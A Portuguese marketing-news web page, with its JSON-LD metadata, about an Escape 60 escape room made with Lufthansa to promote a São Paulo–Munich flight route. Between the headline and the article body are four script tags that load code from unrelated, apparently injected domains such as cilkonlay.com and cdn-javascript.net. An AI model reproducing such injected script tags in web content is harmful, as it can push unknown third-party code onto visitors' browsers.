\n\n\n\n\n\n","alternativeHeadline":"Inspirada em diversos elementos da cultura alemã, a novidade faz parte das ações que marcam o início da rota direta ligando São Paulo a Munique - que começa a operar em 3 de dezembro.\n\n\n\n\n\n\n\n","abstract":"Inspirada em diversos elementos da cultura alemã, a novidade faz parte das ações que marcam o início da rota direta ligando São Paulo a Munique - que começa a operar em 3 de dezembro.\n\n\n\n\n\n\n\n","articleBody":"Novidade foi desenvolvida para promover a nova rota São Paulo-Munique.\r\n\r\nO Escape 60, rede de franquias pioneira no desenvolvimento de jogos de fuga, em parceria com a Lufthansa e com o Centro de Turismo Alemão (DZT), anuncia a sala "O Legado Alemão", que estará disponível de 11 a 25 de novembro, na unidade Vila Olímpia, São Paulo.\r\n\r\nO melhor do entretenimento está aqui.\r\n\r\nMais sobre turismo no Brasil e no Exterior aqui.\r\n\r\nInspirada em diversos elementos da cultura alemã, a novidade faz parte das ações que marcam o início da rota direta ligando São Paulo a Munique - que começa a operar em 3 de dezembro.\r\n\r\nA diretora do DZT no Brasil, Margaret Grantham, lembra que a retomada da rota contribuirá ainda mais para ampliar a presença de brasileiros no Sul da Alemanha. “De janeiro a julho, essa região recebeu pouco mais de 28 mil turistas brasileiros, um aumento de 3,2% comparado ao mesmo período do ano anterior. E os visitantes brasileiros já são responsáveis por quase 11 mil pernoites mensais na cidade da Baviera, famosa por promover a Oktoberfest.”, revela Margaret.\r\n\r\n\r\n\r\nA sala conta a história de uma herança deixada para os jogadores por um tio alemão. Para resgatar esse tesouro, que inclui o legado da família, os participantes precisarão de muita persistência e união, além de jogo de cintura para correr contra o tempo e vencer esse desafio em apenas 60 minutos.\r\n\r\nPara Jeannette Galbinski, sócia e diretora de marketing do Escape 60, a parceria reforça o pioneirismo da marca e o compromisso de inovar sempre. “Estamos superempolgados em lançar a primeira sala com a temática de um país no Escape 60 e por nos unirmos a uma empresa que também busca surpreender seus clientes com ações inovadoras. Certamente iremos ampliar nosso alcance com essa novidade e fidelizar ainda mais nossos escape lovers.”, avalia Jeannette.\r\n\r\n“Estamos muito animados em oferecer aos brasileiros a oportunidade de vivenciar uma experiência Lufthansa e conhecer um pouco mais sobre Munique por meio de uma atividade lúdica.”, afirma Annette Taeuber, diretora de Vendas do Lufthansa Group para o Brasil.\r\n\r\nPara participar, é necessário estar em um grupo de, no mínimo, quatro pessoas, e, no máximo, oito. Os ingressos são vendidos exclusivamente por meio do site, via PagSeguro.","speakable":{"@type":"SpeakableSpecification","cssSelector":[".single-head",".single-body"]},"isAccessibleForFree":true,"genre":["Experiência de Marca"]},{"@type":"WebPage","@id":"https://www.promoview.com.br/escape-60-e-lufthansa-inauguram-sala-inspirada-na-cultura-alema/","url":"https://www.promoview.com.br/escape-60-e-lufthansa-inauguram-sala-inspirada-na-cultura-alema/","name":"Escape 60 e Lufthansa inauguram sala inspirada na cultura alemã - Promoview - Insights sobre Brand Experience","isPartOf":{"@id":"https://www.promoview.com.br/#website"},"primaryImageOfPage":{"@id":"https://www.promoview.com.br/escape-60-e-lufthansa-inauguram-sala-inspirada-na-cultura-alema/#primaryimage"},"image":{"@id":"https://www.promoview.com.br/escape-60-e-lufthansa-inauguram-sala-inspirada-na-cultura-alema/#primaryimage"},"thumbnailUrl":"https://uploads.promoview.com.br/2023/12/d01e4696.jpg","datePublished":"2019-11-01T06:52:00+00:00","dateModified":"2025-04-25T04:16:58+00:00","description":"Inspirada em diversos elementos da cultura alemã, a novidade faz parte das ações que marcam o início da rota direta ligando São Paulo a Munique - que começa a operar em 3 de dezembro.","breadcrumb":{"@id":"https://www.promoview.com.br/escape-60-e-lufthansa-inauguram-sala-inspirada-na-cultura-alema/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://www.promoview.com.br/escape-60-e-lufthansa-inauguram-sala-inspirada-na-cultura-alema/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/escape-60-e-lufthansa-inauguram-sala-inspirada-na-cultura-alema/#primaryimage","url":"https://uploads.promoview.com.br/2023/12/d01e4696.jpg","contentUrl":"https://uploads.promoview.com.br/2023/12/d01e4696.jpg","width":710,"height":528},{"@type":"BreadcrumbList","@id":"https://www.promoview.com.br/escape-60-e-lufthansa-inauguram-sala-inspirada-na-cultura-alema/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.promoview.com.br/"},{"@type":"ListItem","position":2,"name":"Experiência de Marca","item":"https://www.promoview.com.br/experiencia-de-marca/"},{"@type":"ListItem","position":3,"name":"Escape 60 e Lufthansa inauguram sala inspirada na cultura alemã"}]},{"@type":"WebSite","@id":"https://www.promoview.com.br/#website","url":"https://www.promoview.com.br/","name":"Promoview","description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","publisher":{"@id":"https://www.promoview.com.br/#organization"},"alternateName":"Promoview","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.promoview.com.br/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https://www.promoview.com.br/#organization","name":"Promoview","alternateName":"Promoview","url":"https://www.promoview.com.br/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/logo/image/","url":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","contentUrl":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","width":696,"height":696,"caption":"Promoview"},"image":{"@id":"https://www.promoview.com.br/#/schema/logo/image/"},"sameAs":["https://www.instagram.com/promoview/","https://www.linkedin.com/company/promoview/","https://www.youtube.com/channel/UCDOyD3fGgwpvMsWF7pqi7AA","https://news.google.com/publications/CAAqBwgKMK-NuAswvKjPAw?hl=pt-BR&gl=BR&ceid=BRpt-419","https://open.spotify.com/show/6mken3c6hcUDSsc3VwEDlf?si=a2b3d9018a954fcc&nd=1&dlsi=695ae8972acb48d6","https://api.whatsapp.com/send/?phone=5511948022977&text&type=phone_number&app_absent=0"],"description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","email":"[email protected]","telephone":"41 991944093","legalName":"JULIO FEIJO NETO ME","foundingDate":"2006-08-18","vatID":"05.151.320/0001-66","numberOfEmployees":{"@type":"QuantitativeValue","minValue":"1","maxValue":"10"}},{"@type":"Person","@id":"https://www.promoview.com.br/#/schema/person/image/af4fc0bf9cab018130e1c090810cbd48","name":"Redação Promoview","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/person/image/5c28630bdeeca78554bd08ce207d5213","url":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","contentUrl":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","width":120,"height":120,"caption":"Redação Promoview"},"url":"https://www.promoview.com.br/autor/redacao-promoview/"}]}
Escape 60 e Lufthansa inauguram sala inspirada na cultura alemã
Inspirada em diversos elementos da cultura alemã, a novidade faz parte das ações que marcam o início da rota direta ligando São Paulo a Munique - que começa a operar em 3 de dezembro.
<script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script>
<script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script>
<script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573088980417" type="text/javascript"></script>
<script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>
Novidade foi desenvolvida para promover a nova rota São Paulo-Munique.
O Escape 60, rede de franquias pioneira no desenvolvimento de jogos de fuga, em parceria com a Lufthansa e com o Centro de Turismo Alemão (DZT), anuncia a sala "O Legado Alemão", que estará disponível de 11 a 25 de novembro, na unidade Vila Olímpia, São Paulo.
Inspirada em diversos elementos da cultura alemã, a novidade faz parte das ações que marcam o início da rota direta ligando São Paulo a Munique – que começa a operar em 3 de dezembro.
A diretora do DZT no Brasil, Margaret Grantham, lembra que a retomada da rota contribuirá ainda mais para ampliar a presença de brasileiros no Sul da Alemanha. “De janeiro a julho, essa região recebeu pouco mais de 28 mil turistas brasileiros, um aumento de 3,2% comparado ao mesmo período do ano anterior. E os visitantes brasileiros já são responsáveis por quase 11 mil pernoites mensais na cidade da Baviera, famosa por promover a Oktoberfest.”, revela Margaret.
A sala conta a história de uma herança deixada para os jogadores por um tio alemão. Para resgatar esse tesouro, que inclui o legado da família, os participantes precisarão de muita persistência e união, além de jogo de cintura para correr contra o tempo e vencer esse desafio em apenas 60 minutos.
Para Jeannette Galbinski, sócia e diretora de marketing do Escape 60, a parceria reforça o pioneirismo da marca e o compromisso de inovar sempre. “Estamos superempolgados em lançar a primeira sala com a temática de um país no Escape 60 e por nos unirmos a uma empresa que também busca surpreender seus clientes com ações inovadoras. Certamente iremos ampliar nosso alcance com essa novidade e fidelizar ainda mais nossos escape lovers.”, avalia Jeannette.
“Estamos muito animados em oferecer aos brasileiros a oportunidade de vivenciar uma experiência Lufthansa e conhecer um pouco mais sobre Munique por meio de uma atividade lúdica.”, afirma Annette Taeuber, diretora de Vendas do Lufthansa Group para o Brasil.
Para participar, é necessário estar em um grupo de, no mínimo, quatro pessoas, e, no máximo, oito. Os ingressos são vendidos exclusivamente por meio do site, via PagSeguro.
Nós usamos cookies e outras tecnologias semelhantes para melhorar a sua experiência em nossos serviços, personalizar publicidade e recomendar conteúdo de seu interesse. Ao utilizar nossos serviços, você está ciente dessa funcionalidade.
Termos de Uso
e
Política de privacidade